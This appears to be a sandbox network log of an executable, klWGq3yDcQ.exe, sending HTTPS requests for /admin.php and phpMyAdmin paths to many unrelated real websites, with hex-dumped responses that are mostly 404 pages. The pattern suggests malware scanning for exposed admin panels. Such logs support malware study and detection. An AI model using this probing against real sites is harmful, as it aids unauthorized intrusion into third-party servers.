                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 37 66 65 30 0d 0a 74 65 72 2d 73 65 6c 65 63 74 20 79 2d 79 65 61 72 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 4e c3 ba 6d 65 72 6f 20 64 65 20 53 c3 a9 72 69 65 22 2f 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 66 69 6c 74 65 72 2d 62 75 74 74 6f 6e 20 62 74 6e 20 62 74 6e 2d 6c 67 20 6e 6f 2d 72 61 64 69 75 73 22 3e 46 69 6c 74 72 61 72 3c 2f 62 75 74 74 6f 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 6e 61 76 3e 0a 09 09 09 0a 09 09 0a 09 0a 3c 73 63 72 69 70 74 3e 0a 09 76 61 72 20
                                                                                                                                                                                                    Data Ascii: 7fe0ter-select y-year" placeholder="Nmero de Srie"/><button type="submit" class="filter-button btn btn-lg no-radius">Filtrar</button></div></div></div></div></div></nav><script>var
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16360INData Raw: 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 74 77 6f 22 20 3e 0a 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 74 68 72 65 65 22 3e 0a 09 09 09 09 0a 09 09 09 09 09 0a 09 09 09 09 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 73 65 63 6f 6e 64 61 72 79 2d 62 6f 78 2d 66 6f 75 72 22 3e 0a 09 09 09 09 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 5f 6c 6f 67 6f 22 3e 0a 09 09 09 09 09 09 3c 61 20 68 72 65
                                                                                                                                                                                                    Data Ascii: </div><div class="container-secondary-box-two" ></div><div class="container-secondary-box-three"></div><div class="container-secondary-box-four"><div class="footer__logo"><a hre
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16384INData Raw: 37 66 65 30 0d 0a 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 75 6e 74 64 6f 77 6e 2d 74 65 6d 70 6c 61 74 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 78 2d 68 61 6e 64 6c 65 62 61 72 73 2d 74 65 6d 70 6c 61 74 65 22 3e 0a 09 09 7b 7b 23 69 66 20 73 6b 75 2e 62 65 73 74 7d 7d 0a 09 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 6f 66 66 65 72 73 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 66 66 65 72 22 20 63 6c 61 73 73 3d 22 63 6f 75 6e 74 64 6f 77 6e 2d 6f 66 66 65 72 22 3e 0a 09 09 3c 6c 69 6e 6b 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 22 2f 3e
                                                                                                                                                                                                    Data Ascii: 7fe0</script><script id="countdown-template" type="text/x-handlebars-template">{{#if sku.best}}<div itemprop="offers" itemscope="" itemtype="http://schema.org/Offer" class="countdown-offer"><link itemprop="url" href="https://www.rech.com/"/>
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC16360INData Raw: 09 64 61 74 61 2d 6f 72 69 67 69 6e 70 72 69 63 65 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 6f 72 69 67 69 6e 50 72 69 63 65 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 65 6c 6c 65 72 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 73 65 6c 6c 65 72 4e 61 6d 65 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 69 64 3d 22 7b 7b 73 6b 75 2e 73 6b 75 49 64 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 6b 75 2d 6f 62 6a 3d 22 22 0a 09 09 09 09 09 09 64 61 74 61 2d 70 61 72 74 6e 65 72 53 74 6f 63 6b 73 3d 22 7b 7b 73 6b 75 2e 70 61 72 74 6e 65 72 53 74 6f 63 6b 73 7d 7d 22 0a 09 09 09 09 09 09 64 61 74 61 2d 73 74 6f 63 6b 2d 72 65 6d 61 69 6e 69 6e 67 3d 22 7b 7b 73 6b 75 2e 62 65 73 74 2e 73 74 6f 63 6b 52 65 6d 61 69 6e 69 6e 67 7d 7d 22 0a 09 09 09 09 09 09 64 61
                                                                                                                                                                                                    Data Ascii: data-originprice="{{sku.best.originPrice}}"data-seller="{{sku.best.sellerName}}"data-id="{{sku.skuId}}"data-sku-obj=""data-partnerStocks="{{sku.partnerStocks}}"data-stock-remaining="{{sku.best.stockRemaining}}"da
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC3475INData Raw: 64 38 63 0d 0a 6e 64 61 72 79 3a 20 27 23 34 66 34 66 34 66 27 2c 0a 09 09 63 6f 6c 6f 72 54 65 72 74 69 61 72 79 3a 20 27 23 34 66 34 66 34 66 27 2c 0a 09 09 63 6f 6c 6f 72 51 75 61 74 65 72 6e 61 72 79 3a 20 27 23 32 36 37 37 46 39 27 2c 0a 09 09 63 6f 6c 6f 72 4e 65 75 74 72 61 6c 3a 20 22 23 42 36 42 36 42 36 22 2c 0a 09 09 63 6f 6c 6f 72 45 72 72 6f 72 3a 20 22 23 45 41 30 38 30 38 22 2c 0a 09 09 63 6f 6c 6f 72 41 6c 65 72 74 3a 20 22 23 45 31 41 31 30 30 22 2c 0a 09 09 63 6f 6c 6f 72 53 75 63 63 65 73 73 3a 20 22 23 30 37 42 34 35 44 22 0a 09 7d 0a 0a 09 77 69 6e 64 6f 77 2e 63 77 73 54 68 65 6d 65 54 6f 6b 65 6e 73 28 74 6f 6b 65 6e 73 29 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 09 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a
                                                                                                                                                                                                    Data Ascii: d8cndary: '#4f4f4f',colorTertiary: '#4f4f4f',colorQuaternary: '#2677F9',colorNeutral: "#B6B6B6",colorError: "#EA0808",colorAlert: "#E1A100",colorSuccess: "#07B45D"}window.cwsThemeTokens(tokens)</script><script type="text/j
                                                                                                                                                                                                    2023-11-26 05:59:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    264192.168.2.46248013.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC176OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:40 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    265192.168.2.46247754.83.33.364436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC173OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC262INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 76 61 72 79 3a 20 58 2d 46 6f 72 77 61 72 64 65 64 2d 50 72 6f 74 6f 63 6f 6c 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.52 (Ubuntu)vary: X-Forwarded-Protocolcache-control: no-cache, no-store, must-revalidateConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=ut
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC7930INData Raw: 35 38 33 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 62 61 73 65 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 61
                                                                                                                                                                                                    Data Ascii: 5836<!doctype html><html class="no-js" lang="en"> <head> <base href="https://ce-logic.com/">...[if lte IE 6]></base><![endif]--> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>Pa
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC14658INData Raw: 52 65 73 65 61 72 63 68 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 2f 65 64 75 63 61 74 69 6f 6e 61 6c 2d 73 6f 6c 75 74 69 6f 6e 73 2d 70 61 67 65 2f 6d 61 6b 65 72 73 70 61 63 65 2f 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 77 68 69 74 65 20 61 6c 69 67 6e 2d 63 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 62 74 6e 2d 74 65 78 74 22 3e 4d 61 6b 65 72 73 70 61 63 65 3c 2f 70 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: Research Solutions</p></a><a href="/educational-solutions-page/makerspace/" class="btn white align-c"><p class="btn-text">Makerspace</p></a></div></div></div>
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    266192.168.2.46247876.223.105.2304436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC207OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: saudi-jamac.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: dps_site_id=us-east-1
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC288INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 34 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 44 50 53 2f 32 2e 30 2e 30 2b 73 68 61 2d 33 32 31 30 62 34 39 0d 0a 58 2d 56 65 72 73 69 6f 6e 3a 20 33 32 31 30 62 34 39 0d 0a 58 2d 53 69 74 65 49 64 3a 20 75 73 2d 65 61 73 74 2d 31 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 70 73 5f 73 69 74 65 5f 69 64 3d 75 73 2d 65 61 73 74 2d 31 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-3210b49X-Version: 3210b49X-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sun, 26 Nov 2023 05
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC964INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    267192.168.2.46248515.235.14.1414436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC172OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC15911INData Raw: 37 39 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: 7970<!DOCTYPE html><html lang="es" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC15190INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 2f 64 65 66 2d 75 6e 69 2d 73 6f 6d 6f 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 44 65 66 65 6e 73 6f 72 c3 ad 61 20 55 6e 69 76 65 72 73 69 74 61 72 69 61 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 6e 61 6a 2e 65 6e 63 69 63 6c 6f 2e 65 73 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: </a></li><li class="menu-item"><a href="/es/def-uni-somos"> Defensora Universitaria </a></li><li class="menu-item"><a href="https://unaj.enciclo.es/">


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    268192.168.2.461828199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC190OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65 2d 78 73 72 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:40 GMTSet-Cookie: publishedsite-xsrf
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC608INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6e 68 6c 57 55 74 4e 5a 6d 55 76 5a 47 6c 79 4e 7a 55 34 5a 57 39 6f 65 6b 39 6c 4e 6c 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 6a 4a 7a 55 45 52 33 51 7a 55 31 54 7a 6c 75 61 6a 56 6a 57 6e 70 75 61 55 45 7a 5a 6b 6c 46 59 6a 4e 68 4d 6b 74 33 65 56 5a 56 64 45 52 33 52 57 4e 71 54 7a 67 34 54 6d 46 35 54 6a 52 73 65 55 45 79 4d 6d 78 50 63 55 6c 43 4d 6b 35 52 64 56 52 46 63 46 6c 4f 4d 6d 31 74 62 48 5a 7a 61 32 78 4d 54 47 74 4b 51 54 68 58 53 56 68 69 53 47 35 47 57 6b 5a 50 63 45 56 71 4b 32 52 75 55 56 46 43 53 6e 68 71 53 47 5a 4d 62 57 4a 52 59 58 4e 55 61 6e 42 48 4e 55 5a 42 57 58 6c 31 61 7a 4a 33 64 57
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6InhlWUtNZmUvZGlyNzU4ZW9oek9lNlE9PSIsInZhbHVlIjoiQjJzUER3QzU1TzluajVjWnpuaUEzZklFYjNhMkt3eVZVdER3RWNqTzg4TmF5TjRseUEyMmxPcUlCMk5RdVRFcFlOMm1tbHZza2xMTGtKQThXSVhiSG5GWkZPcEVqK2RuUVFCSnhqSGZMbWJRYXNUanBHNUZBWXl1azJ3dW
